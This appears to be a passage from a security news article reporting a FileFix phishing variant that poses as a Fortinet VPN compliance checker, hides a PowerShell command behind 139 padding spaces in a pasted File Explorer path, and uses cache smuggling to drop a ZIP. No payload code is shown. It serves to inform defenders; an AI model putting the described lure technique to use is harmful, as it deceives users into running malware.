A new variant of the FileFix social engineering attack uses cache smuggling to secretly download a malicious ZIP archive onto a victim’s system and bypassing security software.
The new phishing and social engineering attack impersonates a "Fortinet VPN Compliance Checker" and was first spotted by cybersecurity researcher P4nd3m1cb0y, who shared information about it on X.
In a new report by cybersecurity firm Expel, cybersecurity researcher Marcus Hutchins shares more details on how this attack works.
For those not familiar with FileFix attacks, they are a variant of the ClickFix social engineering attack developed by Mr.d0x. Instead of tricking users into pasting malicious commands into operating system dialogs, it uses the Windows File Explorer address bar to execute PowerShell scripts stealthily.
FileFix attack evolves with cache smuggling
In the new phishing attack, a website displays a dialog that poses as a Fortinet VPN "Compliance Checker, directing users to paste what looks like a legitimate network path to a Fortinet program on a network share.
Fortinet VPN Compliance Check FileFix lure
Source: Expel
While the lure displays the path " \\Public\Support\VPN\ForticlientCompliance.exe," when copied to the clipboard, it is actually much longer, as it is padded with 139 spaces to hide a malicious PowerShell command.
Due to this padding, when the visitor follows the instructions to open File Explorer and paste the command into the address bar, only the path is displayed, as seen below.
... continue reading